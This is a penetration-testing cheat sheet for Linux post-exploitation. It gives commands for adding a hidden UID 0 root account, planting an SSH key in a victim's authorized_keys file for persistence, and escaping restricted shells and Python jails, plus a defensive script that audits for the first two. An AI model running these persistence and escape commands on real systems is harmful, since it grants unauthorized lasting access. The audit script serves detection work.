# Linux

## Introduction

In this section, you will find several useful commands for the post-exploitation phase on Linux systems.

## User

### Creating a user

```bash
sudo useradd [-m] <USERNAME>
```

### Add a user to a group

```bash
sudo usermod -aG <GROUP> <USERNAME>
```

### Create an alternative root user

```bash
useradd -m -ou 0 -g 0 -p <ENCRYPTED_PASSWORD> -s /bin/bash <USERNAME>
```

## Login through SSH

Sometimes we have a remote terminal as a user and want to log in as that user over SSH, but **we do not know** their **password**. SSH keys are used for these cases.

1. Generate an SSH key pair.

```bash
kali@kali:~$ ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
[...]
```

2. Add the public key to the victim's `~/.ssh/authorized_keys` file:

```bash
echo -e "\n<PUB_KEY>\n" >> ~/.ssh/authorized_keys
```

3. Log in.

```bash
ssh -i ~/.ssh/id_rsa <USERNAME>@<IP>
```
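
From the defender's side, both persistence techniques above (the UID 0 account from "Create an alternative root user" and the key appended to `~/.ssh/authorized_keys`) leave artifacts that are simple to audit. The script below is an added example, not part of the original guide; the function names and the sample accounts and keys are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example. All sample data below is constructed.

# List "name:shell" for each account other than root whose UID is 0.
# $1: passwd-format file (defaults to /etc/passwd).
uid0_accounts() {
    awk -F: '$1 !~ /^#/ && $3 == 0 && $1 != "root" { print $1 ":" $7 }' \
        "${1:-/etc/passwd}"
}

# List "line-number key-type comment" for each key in an authorized_keys
# file so unexpected entries stand out. Leading options are skipped.
# $1: authorized_keys file.
authorized_key_entries() {
    awk '
        NF == 0 || $1 ~ /^#/ { next }
        {
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-sha2-|sk-)/) {
                    c = "(no-comment)"
                    if (i + 2 <= NF) c = $(i + 2)
                    print NR, $i, c
                    next
                }
            print NR, "UNPARSED"
        }' "$1"
}

# Write constructed sample files into directory $1 for a dry run.
write_samples() {
    cat > "$1/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc-backup:x:0:0::/home/svc-backup:/bin/bash
EOF
    cat > "$1/authorized_keys" <<'EOF'
# managed by config management
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEKEYONE alice@laptop

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABEXAMPLEKEYTWO kali@kali
EOF
}

if [ "${1:-}" = "--demo" ]; then
    d=$(mktemp -d) && write_samples "$d"
    uid0_accounts "$d/passwd"
    authorized_key_entries "$d/authorized_keys"
    rm -rf "$d"
fi
```

Run it with `--demo` to see the output on the constructed samples, or call `uid0_accounts` with no argument to check the live `/etc/passwd`; comparing `authorized_key_entries` output against a known-good baseline is what surfaces an added key.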

## Shell Escapes

You may have obtained access to a restricted shell that allows only a minimal number of commands and prevents you from accessing other directories or files.

In this section, you will find some ways to escape those restricted shells.

### SSH

```bash
ssh <USERNAME>@<TARGET_IP> -t "bash --noprofile -i"
```

### Python Jail

```bash
echo os.system('/bin/bash')
```

For more examples of how to escape restricted shells, read the following articles.

* [rbash escape | rbash restricted shell escape](https://www.hacknos.com/rbash-escape-rbash-restricted-shell-escape/)
* [Escaping Restricted Linux Shells](https://www.sans.org/blog/escaping-restricted-linux-shells/)
* [Escaping python jails](https://anee.me/escaping-python-jails-849c65cf306e)

